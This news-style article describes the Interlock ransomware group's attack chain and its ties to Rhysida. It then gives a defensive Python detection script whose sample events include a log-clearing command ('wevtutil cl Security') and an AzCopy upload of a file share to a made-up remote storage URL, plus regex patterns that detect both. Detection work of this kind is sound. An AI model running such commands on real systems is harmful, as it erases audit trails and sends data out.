A new ransomware group known as Interlock has been causing significant havoc across various sectors, with reports of targeted attacks on US healthcare, IT, and government organizations and on European manufacturing. Threat analysts have identified Interlock as a group that employs sophisticated tactics, including “big-game hunting” and double extortion, in which the group threatens to publish stolen data unless a ransom is paid.
The Cisco Talos report released today highlights how Interlock operates with a high level of precision, using a data leak site called “Worldwide Secrets Blog” to publish stolen data and offering victims a chat channel for negotiation. The group’s systematic approach to exploiting weaknesses in organizations’ defenses has raised concern among cybersecurity experts.
According to Cisco Talos, Interlock’s attack chain typically spans around 17 days, during which the group gains unauthorized access to systems and deploys ransomware to encrypt files. The group gains initial access through a fake Google Chrome browser updater that installs a Remote Access Tool (RAT) disguised as a legitimate update. This RAT collects detailed system information, establishes a secure connection to a command-and-control (C2) server, and transmits encrypted data, while also installing a credential-stealing component that captures login details for online accounts.
Interlock’s ability to evade detection is further enhanced by disabling Endpoint Detection and Response (EDR) tools and clearing event logs. The group also uses Remote Desktop Protocol (RDP) and other remote access tools for lateral movement within networks, reaching other systems on the network, potentially including Linux hosts.
The encryption stage of Interlock’s attacks involves both Windows and Linux variants of the ransomware, with both versions built on the cryptographic library LibTomCrypt. To keep the compromised system operable, the ransomware skips critical system folders and certain file extensions. The Windows variant encrypts files in Cipher Block Chaining (CBC) mode, while the Linux variant may use CBC or RSA encryption.
Furthermore, Cisco Talos’ analysis has revealed a potential connection between Interlock and the Rhysida ransomware group, with overlapping attack techniques, tools, and even code. Both groups have been observed using the AzCopy tool to transfer stolen data to remote storage and deploying ransom notes with similar themes that present the attackers as “helpful” breach informants rather than direct threats.
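Two of the behaviours described above, event log clearing and AzCopy uploads to remote storage, leave telemetry that a defender can alert on. The following is an added detection example, not code from the Cisco Talos report or from any vendor product. It runs simple rules over a handful of constructed, normalised Windows event records (the event records, hostnames, user names and the storage URL are all made up for the example; the field layout is an assumption about how a SIEM might normalise Security, System and Sysmon events). Windows Event ID 1102 (Security log cleared), Event ID 104 (System log cleared) and Sysmon Event ID 1 (process creation) are real event identifiers; the rule names are the author's own.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a normalised shape (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2024-10-01T03:12:44Z", "host": "WS-042", "channel": "Security",
     "event_id": 4624, "user": "jdoe", "cmdline": ""},                       # normal logon
    {"ts": "2024-10-01T03:15:02Z", "host": "WS-042",
     "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
     "user": "jdoe", "cmdline": "wevtutil.exe cl Security"},                   # log clearing via wevtutil
    {"ts": "2024-10-01T03:15:03Z", "host": "WS-042", "channel": "Security",
     "event_id": 1102, "user": "jdoe", "cmdline": ""},                        # Security log was cleared
    {"ts": "2024-10-01T03:40:19Z", "host": "WS-042",
     "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
     "user": "jdoe", "cmdline": r"C:\Tools\azcopy.exe copy C:\Share\finance "
     "https://example-storage.blob.core.windows.net/c1 --recursive"},         # upload to remote storage
    {"ts": "2024-10-01T09:00:00Z", "host": "SRV-07",
     "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
     "user": "backup", "cmdline": "azcopy.exe --version"},                     # benign AzCopy use
]


@dataclass
class Alert:
    rule: str
    host: str
    ts: str
    detail: str


# (channel, event_id) pairs Windows emits when an event log is cleared.
LOG_CLEARED_IDS = {("Security", 1102), ("System", 104)}

# Process command lines of interest (case-insensitive).
CLEAR_CMD = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)
AZCOPY_UPLOAD = re.compile(r"\bazcopy(\.exe)?\s+(copy|cp|sync)\b.*?(https?://\S+)",
                           re.IGNORECASE)


def is_process_creation(event):
    """True for Sysmon Event ID 1 records."""
    return event["event_id"] == 1 and event["channel"].startswith("Microsoft-Windows-Sysmon")


def detect(events):
    """Apply the three rules to a list of normalised events, returning alerts in order."""
    alerts = []
    for e in events:
        if (e["channel"], e["event_id"]) in LOG_CLEARED_IDS:
            alerts.append(Alert("event_log_cleared", e["host"], e["ts"],
                                f"{e['channel']} log cleared by {e['user']}"))
        if is_process_creation(e):
            cmd = e.get("cmdline", "")
            if CLEAR_CMD.search(cmd):
                alerts.append(Alert("wevtutil_clear", e["host"], e["ts"], cmd))
            m = AZCOPY_UPLOAD.search(cmd)
            if m:
                alerts.append(Alert("azcopy_remote_upload", e["host"], e["ts"],
                                    f"upload to {m.group(3)} by {e['user']}"))
    return alerts


def correlate(alerts):
    """Hosts that triggered more than one distinct rule: anti-forensics plus
    staging/upload on the same machine is a stronger signal than either alone."""
    rules_by_host = {}
    for a in alerts:
        rules_by_host.setdefault(a.host, set()).add(a.rule)
    return sorted(h for h, rules in rules_by_host.items() if len(rules) > 1)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.rule}] {a.ts} {a.host}: {a.detail}")
    print("hosts with multiple rule hits:", correlate(found))
```

The benign `azcopy.exe --version` record on SRV-07 produces no alert because the upload rule requires a copy or sync verb followed by a remote URL; in production the URL allow-list (your own storage accounts) is where most of the tuning happens. The log-clearing rule fires twice for the same action, once on the process command line and once on the resulting 1102 event, which is useful when only one of the two telemetry sources is available.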
The trend towards operational diversification and collaboration among ransomware groups, as seen in the case of Interlock and Rhysida, reflects a broader pattern in the cyber threat landscape. Threat actors are increasingly pooling their resources and expertise to enhance their capabilities and maximize the impact of their attacks.
In conclusion, the emergence of the Interlock ransomware group underscores the evolving and complex nature of cyber threats facing organizations worldwide. As such, it is imperative for businesses and government entities to enhance their cybersecurity measures and remain vigilant against sophisticated ransomware attacks like those orchestrated by Interlock.